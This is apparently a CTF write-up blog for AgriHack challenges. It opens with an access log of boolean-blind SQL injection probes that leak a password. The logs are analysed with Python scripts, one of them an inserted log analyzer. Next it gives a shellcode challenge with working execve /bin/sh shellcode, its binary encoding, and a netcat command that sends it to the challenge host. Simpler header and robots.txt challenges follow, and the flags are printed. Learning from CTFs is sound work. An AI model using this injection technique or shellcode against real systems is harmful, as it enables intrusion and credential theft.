127.0.0.1 - - [10/Aug/2016:16:41:01 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E109 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E110 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E109 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E110 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E109 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E108 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E111 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E119 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E123 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E125 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E124 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
Script to convert from base 10 to char:
?? => analyze it yourself :D
#!/usr/bin/env python3
# Johan Wayudi
# Decimal character codes recovered from the log; ?? entries are left for the reader.
a = [70,76,65,71,123,??,111,??,108,73,115,??,111,111,??,125]
data = ""
for i in range(len(a)):
    data += chr(a[i])
print(data)
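The analysis the post leaves to the reader can be scripted as below. This is an added example, not the author's script, and it runs on a constructed two-character sample rather than the challenge log. It assumes what the length probes in the log show: status 200 means the injected condition was true, and the 302 redirect to /hacker.php means it was false.

```python
import re
from urllib.parse import unquote

LINE_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
LEN_RE = re.compile(r"length\(\w+\)\s*(?P<op>[>=])\s*(?P<n>\d+)", re.I)
CHR_RE = re.compile(r"ord\(substr\(\w+,\s*(?P<pos>\d+),\s*1\)\)\s*>\s*(?P<n>\d+)", re.I)


def analyze(log_text, true_status=200):
    """Replay boolean-blind probes from an access log and report what they leaked."""
    bounds = {}              # position -> [lo, hi], meaning lo < ord(char) <= hi
    length, probes = None, 0
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue         # malformed line, skip it
        query = unquote(m.group("url"))
        truth = int(m.group("status")) == true_status
        lm, cm = LEN_RE.search(query), CHR_RE.search(query)
        if lm:
            probes += 1
            if lm.group("op") == "=" and truth:
                length = int(lm.group("n"))   # an equality probe answered "yes"
        elif cm:
            probes += 1
            pos, n = int(cm.group("pos")), int(cm.group("n"))
            b = bounds.setdefault(pos, [-1, 255])
            if truth:
                b[0] = max(b[0], n)           # "yes": ord(char) > n
            else:
                b[1] = min(b[1], n)           # "no":  ord(char) <= n
    leaked = ""
    for pos in range(1, max(bounds, default=0) + 1):
        lo, hi = bounds.get(pos, (-1, 255))
        # A character is fully disclosed only when the interval has closed to one value.
        leaked += chr(hi) if hi - lo == 1 else "?"
    return {"probes": probes, "length": length, "leaked": leaked}


def _line(cond, status):
    """Build one constructed log line in the same format as the challenge log."""
    size = 925 if status == 200 else 734
    return ('127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] '
            f'"GET /?id=7%20and%20{cond} HTTP/1.1" {status} {size} "-" "Python-urllib/1.15"')


# Constructed probes for the secret "Hi" (not the challenge flag).
_H = [(127, 302), (63, 200), (95, 302), (79, 302), (71, 200), (75, 302), (73, 302), (72, 302)]
_I = [(127, 302), (63, 200), (95, 200), (111, 302), (103, 200), (107, 302), (105, 302), (104, 200)]
SAMPLE_LOG = "\n".join(
    [_line("length(password)%3E5", 302),
     '127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"',
     _line("length(password)=4", 302), _line("length(password)=3", 302),
     _line("length(password)=2", 200)]
    + [_line(f"ord(substr(password,1,1))%3E{n}", s) for n, s in _H]
    + [_line(f"ord(substr(password,2,1))%3E{n}", s) for n, s in _I]
)

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

A `?` in the result marks a position whose binary search never closed, for example when the log is truncated, so the report separates fully disclosed characters from partially probed ones.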

Thursday, February 16, 2017

AgriHack : Shellcode (Pwning)




nc to kebon.agrihack.party 30003


Here we are asked to submit shellcode in binary form. OK, let's try it. Here I use shellcode from shell-storm.org. The hint in the challenge says the data sent must be in binary form, so we first convert the payload of the shellcode above from hexadecimal (base 16) to binary.

payload = \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80

binary = 001100011100100111110111111000010101000101101000001011110010111101110011011010000110100000101111011000100110100101101110100010011110001110110000000010111100110110000000
Result of disassembling the payload using the pwntools library:



Let's just try sending the payload to the running program..

$ (python -c "print '001100011100100111110111111000010101000101101000001011110010111101110011011010000110100000101111011000100110100101101110100010011110001110110000000010111100110110000000'";cat -) | nc kebon.agrihack.party 30002

\\m// yeay..
flag : AGRI{shellcode_itu_keren_tapi_gw_gak_ngerti}

AgriHack : Header (Basic)




Use curl with the -I option (capital i).


Flag : AGRI{flag_ada_di_header}

AgriHack : So Easy (Basic)





Flag : AGRI{d3lic1ou5_0m}


AgriHack : Robots (Basic)


We are given a link to a website (challs.agrihack.party) with the clue "find the Robot that is here"; for an explanation of what the robots.txt file is for, please read here ,




flag : AGRI{RoBots_TXT_Is_not_seCurE}